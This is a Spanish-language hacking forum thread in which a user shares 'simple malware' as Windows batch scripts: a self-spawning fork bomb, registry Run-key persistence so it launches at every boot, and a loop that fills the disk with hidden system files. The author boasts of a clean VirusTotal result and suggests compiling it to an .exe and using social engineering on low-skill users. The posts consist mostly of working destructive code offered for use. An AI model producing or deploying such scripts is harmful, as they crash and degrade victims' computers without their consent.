comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Malware sencillo

  • 3 Respuestas
  • 2627 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« en: Enero 07, 2015, 07:41:11 am »
Buenas a todos os traigo un malware sencillo hecho en batch.

Archivo won.bat:

Código: DOS
  1. @echo off
  2. :va
  3. start won.bat
  4. goto va
  5.  

Esto lo que hace es abrir muchas veces ese mismo archivo (que a su vez abriria otra vez el mismo archivo) hasta que colapse el sistema, el problema que esto asi esta muy feo, entonces se crea este otro archivo.

Archivo registro.bat:

Código: DOS
  1. @echo off
  2. set lugar=%CD%\won.bat
  3. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
  4. start won.bat
  5.  

Este segundo archivo modifica el registro para que cuando se abra windows se abra el archivo directamente, y despues se abre el archivo (por si lo borra)

PD: Si abre desde modo seguro no se abrira el archivo.
PD2: Según vt los dos archivos están limpios.

EDITO

Hay una tercera opción, seria hacerlo todo en un solo archivo.

Archivo won.bat:

Código: DOS
  1. @echo off
  2. set lugar=%CD%\won.bat
  3. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%" /f
  4. :va
  5. start won.bat
  6. goto va
  7.  

EDITO 2

Otra forma de  hacerlo en un solo archivo

Código: DOS
  1. @echo off
  2. set lugar=%CD%\won.bat
  3. set lugar1=%CD%\hola.txt
  4. if exist %lugar1% (goto va) else (goto install)
  5. :install
  6. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
  7. echo hola > hola.txt
  8. :va
  9. start "won.bat"
  10. goto va
  11.  

EDITO 3

Otro codigo que lo que hace es ir llenandonos poco a poco la memoria del disco duro.

Código: DOS
  1. @echo off
  2. :bucle
  3. set N=%random%%random%%random%.txt
  4. echo  >> %N%
  5. attrib +r +s +h %N%.txt
  6. goto bucle

Código: DOS
  1. @echo off
  2. :bucle
  3. set N = 0
  4. start a.bat
  5. set N = %N%+1
  6. if %N% == 50 (goto exit) else goto bucle

Código: DOS
  1. @echo off
  2. move a.abt C:\
  3. move b.abt C:\
  4. cd C:\
  5. set lugar=%CD%\b.bat
  6. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
  7. start b.bat
« Última modificación: Enero 20, 2015, 08:08:46 pm por rollth »

Conectado DeBobiPro

  • *
  • Underc0der
  • Mensajes: 211
  • Actividad:
    1.67%
  • Reputación 2
  • Como no sabía que era imposible, lo hice.
    • Ver Perfil
« Respuesta #1 en: Enero 07, 2015, 09:18:31 am »
yo una vez hice uno así, pero le agregue lo siguiente

Código: DOS
  1. @echo off
  2. :va
  3. msg * <algún mensaje>
  4. start won.bat
  5. goto va
  6.  

así salta el mensaje por cada vez que se abre , una tontera la verdad jaja


Saludos bro!

Nivel 77 TERCER OJO

Desconectado OnTheCore

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
« Respuesta #2 en: Enero 07, 2015, 11:50:02 pm »
Vamos, eso no es malware, es un script molesto nada mas.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #3 en: Enero 08, 2015, 07:45:21 am »
Vamos, eso no es malware, es un script molesto nada mas.

Hombre  el malware es software que produce daños sin consentimiento del usuario, si en en lugar de bat lo compilas en un .exe (libreria <stdlib.h> en c y la funcion system("")) con un poco de ingenieria social puede llegar a ser muy molesto para un usuario de bajos conocimientos.

 

¿Te gustó el post? COMPARTILO!



Malware "con" CriptoWall

Iniciado por blackdrake

Respuestas: 11
Vistas: 5829
Último mensaje Junio 16, 2018, 03:09:02 pm
por KiddArabic
Otra modalidad malware para conocer de PowerPoint

Iniciado por xhc1

Respuestas: 2
Vistas: 2137
Último mensaje Agosto 23, 2017, 12:58:51 pm
por M03's
FlareVM - Maquina Virtual para analizar Malware

Iniciado por xyz

Respuestas: 1
Vistas: 1384
Último mensaje Enero 07, 2018, 12:43:25 pm
por K A I L
Faking network para Análisis Dinámico de Malware.

Iniciado por cnfs

Respuestas: 3
Vistas: 2376
Último mensaje Enero 30, 2015, 02:32:23 pm
por cnfs
Antiguo malware: FACELIKER. Nuevamente operativo en FaceBook

Iniciado por Gabriela

Respuestas: 0
Vistas: 1622
Último mensaje Septiembre 28, 2017, 03:36:18 pm
por Gabriela